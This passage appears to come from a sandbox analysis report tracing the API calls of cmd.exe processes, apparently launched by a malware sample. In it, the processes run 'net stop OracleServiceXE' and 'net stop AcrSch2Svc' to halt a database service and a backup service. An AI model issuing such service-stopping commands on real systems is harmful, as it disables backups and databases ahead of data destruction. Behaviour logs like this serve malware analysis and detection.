lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.362] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.363] GetProcessHeap () returned 0x6b0000 [0069.364] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20c) returned 0x6c2dd0 [0069.364] GetConsoleTitleW (in: lpConsoleTitle=0x6c2dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.364] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.364] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.364] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.364] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.364] GetProcessHeap () returned 0x6b0000 [0069.364] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400a) returned 0x6c6a48 [0069.364] GetProcessHeap () returned 0x6b0000 [0069.364] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c6a48 | out: hHeap=0x6b0000) returned 1 [0069.365] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.365] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.365] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.365] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.365] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.365] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.365] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.365] GetProcessHeap () returned 0x6b0000 [0069.365] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6c2fe8 [0069.365] GetProcessHeap () returned 0x6b0000 [0069.365] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x10) returned 0x6bff18 [0069.365] GetProcessHeap () returned 0x6b0000 [0069.365] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x34) returned 0x6c3048 [0069.366] GetConsoleTitleW (in: lpConsoleTitle=0x2ef8b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.366] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.366] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.366] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.366] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.366] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.366] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.366] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.366] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.366] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.366] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.366] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.366] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.367] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.367] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.367] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.367] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.367] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.367] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.367] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.367] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.367] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.367] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.367] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.367] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.367] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.367] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.367] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.367] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.367] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.367] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.367] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.367] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.367] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.367] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.367] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.367] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.367] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.367] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.367] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.367] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.367] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.367] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.367] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.367] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.367] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.367] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.367] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.368] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.368] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.368] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.368] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.368] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.368] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.368] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.368] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.368] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.368] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.368] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.368] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.368] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.368] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.368] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.368] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.368] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.368] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.368] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.368] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.368] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.368] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.368] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.368] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.368] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.368] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.368] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.368] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.368] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.368] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.368] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.368] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.368] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.368] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.368] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.368] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.368] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.369] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.369] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.371] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.372] GetProcessHeap () returned 0x6b0000 [0069.372] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6c3088 [0069.372] GetProcessHeap () returned 0x6b0000 [0069.372] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3c) returned 0x6c32a0 [0069.372] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.373] GetProcessHeap () returned 0x6b0000 [0069.373] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x418) returned 0x6b07f0 [0069.373] SetErrorMode (uMode=0x0) returned 0x0 [0069.373] SetErrorMode (uMode=0x1) returned 0x0 [0069.373] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b07f8, lpFilePart=0x2ef3d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef3d8*="Desktop") returned 0x25 [0069.373] SetErrorMode (uMode=0x0) returned 0x1 [0069.373] GetProcessHeap () returned 0x6b0000 [0069.373] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b07f0, Size=0x5c) returned 0x6b07f0 [0069.373] GetProcessHeap () returned 0x6b0000 [0069.373] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b07f0) returned 0x5c [0069.373] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.373] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.373] GetProcessHeap () returned 0x6b0000 [0069.373] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x120) returned 0x6c32e8 [0069.373] GetProcessHeap () returned 0x6b0000 [0069.373] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x238) returned 0x6b0858 [0069.379] GetProcessHeap () returned 0x6b0000 [0069.379] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b0858, Size=0x122) returned 0x6b0858 [0069.379] GetProcessHeap () returned 0x6b0000 [0069.379] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b0858) returned 0x122 [0069.379] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.379] GetProcessHeap () returned 0x6b0000 [0069.379] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe0) returned 0x6c3410 [0069.380] GetProcessHeap () returned 0x6b0000 [0069.380] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6c3410, Size=0x76) returned 0x6c3410 [0069.380] GetProcessHeap () returned 0x6b0000 [0069.380] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6c3410) returned 0x76 [0069.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.381] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2ef154, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef154) returned 0xffffffff [0069.381] GetLastError () returned 0x2 [0069.381] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x2ef154, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef154) returned 0xffffffff [0069.381] GetLastError () returned 0x2 [0069.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.381] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2ef154, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef154) returned 0x6c3490 [0069.381] GetProcessHeap () returned 0x6b0000 [0069.381] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6c34d0 [0069.381] FindClose (in: hFindFile=0x6c3490 | out: hFindFile=0x6c3490) returned 1 [0069.382] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef154, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef154) returned 0xffffffff [0069.382] GetLastError () returned 0x2 [0069.382] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef154, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef154) returned 0x6c3490 [0069.382] GetProcessHeap () returned 0x6b0000 [0069.382] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6c34d0, Size=0x4) returned 0x6c34d0 [0069.382] FindClose (in: hFindFile=0x6c3490 | out: hFindFile=0x6c3490) returned 1 [0069.382] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.382] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.382] GetConsoleTitleW (in: lpConsoleTitle=0x2ef64c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.382] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef4d4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef59c | out: lpAttributeList=0x2ef4d4, lpSize=0x2ef59c) returned 1 [0069.382] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef4d4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef594, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef4d4, lpPreviousValue=0x0) returned 1 [0069.382] GetStartupInfoW (in: lpStartupInfo=0x2ef490 | out: lpStartupInfo=0x2ef490*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.382] GetProcessHeap () returned 0x6b0000 [0069.382] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6c3490 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.382] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.383] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.383] GetProcessHeap () returned 0x6b0000 [0069.383] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c3490 | out: hHeap=0x6b0000) returned 1 [0069.383] GetProcessHeap () returned 0x6b0000 [0069.384] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa) returned 0x6bff30 [0069.384] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.385] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop OracleServiceXE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ef530*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop OracleServiceXE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef57c | out: lpCommandLine="net stop OracleServiceXE", lpProcessInformation=0x2ef57c*(hProcess=0x78, hThread=0x74, dwProcessId=0xad4, dwThreadId=0xad0)) returned 1 [0069.390] CloseHandle (hObject=0x74) returned 1 [0069.390] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0069.390] GetProcessHeap () returned 0x6b0000 [0069.390] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c5f08 | out: hHeap=0x6b0000) returned 1 [0069.390] GetEnvironmentStringsW () returned 0x6c5f08* [0069.390] GetProcessHeap () returned 0x6b0000 [0069.390] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb36) returned 0x6c40c8 [0069.390] FreeEnvironmentStringsW (penv=0x6c5f08) returned 1 [0069.390] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.286] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ef470 | out: lpExitCode=0x2ef470*=0x2) returned 1 [0072.286] CloseHandle (hObject=0x78) returned 1 [0072.286] _vsnwprintf (in: _Buffer=0x2ef5b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef47c | out: _Buffer="00000002") returned 8 [0072.286] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.287] GetProcessHeap () returned 0x6b0000 [0072.287] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c40c8 | out: hHeap=0x6b0000) returned 1 [0072.287] GetEnvironmentStringsW () returned 0x6c40c8* [0072.287] GetProcessHeap () returned 0x6b0000 [0072.287] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb5c) returned 0x6c95b0 [0072.287] FreeEnvironmentStringsW (penv=0x6c40c8) returned 1 [0072.287] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.287] GetProcessHeap () returned 0x6b0000 [0072.287] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c95b0 | out: hHeap=0x6b0000) returned 1 [0072.287] GetEnvironmentStringsW () returned 0x6c40c8* [0072.287] GetProcessHeap () returned 0x6b0000 [0072.287] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb5c) returned 0x6c95b0 [0072.287] FreeEnvironmentStringsW (penv=0x6c40c8) returned 1 [0072.287] GetProcessHeap () returned 0x6b0000 [0072.287] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6bff30 | out: hHeap=0x6b0000) returned 1 [0072.287] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef4d4 | out: lpAttributeList=0x2ef4d4) [0072.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.287] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.287] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.288] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.288] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.288] SetConsoleInputExeNameW () returned 0x1 [0072.288] GetConsoleOutputCP () returned 0x1b5 [0072.288] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.288] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.288] exit (_Code=2) Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1a71000" os_pid = "0x94c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop AcrSch2Svc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x918 [0069.107] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f850 | out: lpSystemTimeAsFileTime=0x32f850*(dwLowDateTime=0x980994f0, dwHighDateTime=0x1d57b18)) [0069.107] GetCurrentProcessId () returned 0x94c [0069.107] GetCurrentThreadId () returned 0x918 [0069.107] GetTickCount () returned 0x114b3e5 [0069.107] QueryPerformanceCounter (in: lpPerformanceCount=0x32f848 | out: lpPerformanceCount=0x32f848*=18932845241) returned 1 [0069.108] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.108] __set_app_type (_Type=0x1) [0069.108] __p__fmode () returned 0x74eb31f4 [0069.108] __p__commode () returned 0x74eb31fc [0069.108] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.108] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.109] GetCurrentThreadId () returned 0x918 [0069.109] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x918) returned 0x60 [0069.109] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.109] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.109] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.574] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.574] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f7e0 | out: phkResult=0x32f7e0*=0x0) returned 0x2 [0069.575] VirtualQuery (in: lpAddress=0x32f817, lpBuffer=0x32f7b0, dwLength=0x1c | out: lpBuffer=0x32f7b0*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.575] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f7b0, dwLength=0x1c | out: lpBuffer=0x32f7b0*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.575] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f7b0, dwLength=0x1c | out: lpBuffer=0x32f7b0*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.575] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f7b0, dwLength=0x1c | out: lpBuffer=0x32f7b0*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.575] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f7b0, dwLength=0x1c | out: lpBuffer=0x32f7b0*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0069.575] GetConsoleOutputCP () returned 0x1b5 [0069.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.575] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.575] _get_osfhandle 